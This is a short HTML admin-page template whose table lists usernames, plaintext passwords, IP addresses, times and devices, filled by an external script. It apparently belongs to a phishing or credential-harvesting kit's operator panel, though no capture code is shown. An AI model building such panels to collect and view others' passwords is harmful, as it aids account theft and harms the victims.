<!DOCTYPE html>
<html lang="en" dt-pgid="page_home" dt-params="" dt-imp-once="true" dt-imp-end-ignore="true" dt-send-beacon="true">

<head>
    <title> ADMIN PAGE </title>
    <meta name="theme-color" content="{{theme}}" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0, minimum-scale=1.0, maximum-scale=1.0" />
     <link rel="stylesheet" href="/public/css/bootstrap.min.css"/>
</head>

<body>
   <br/>
     <p> Disclaimer:: {{disclaimer}}</p>
   <hr/>
   <div style="overflow-x:auto;">
      <table class="table table-striped">
         <thead>
            <tr>
               <th scope="col"># </th>
               <th scope="col"> username</th>
               <th scope="col"> password </th>
               <th scope="col"> IP-Address </th>
               <th scope="col"> Time </th>
               <th scope="col"> Device</th>
            </tr>
         </thead>
         <tbody id="trs">
         
         </tbody>
      </table>
   </div>

<script src="/public/js/api.js"></script>
</body>
</html>
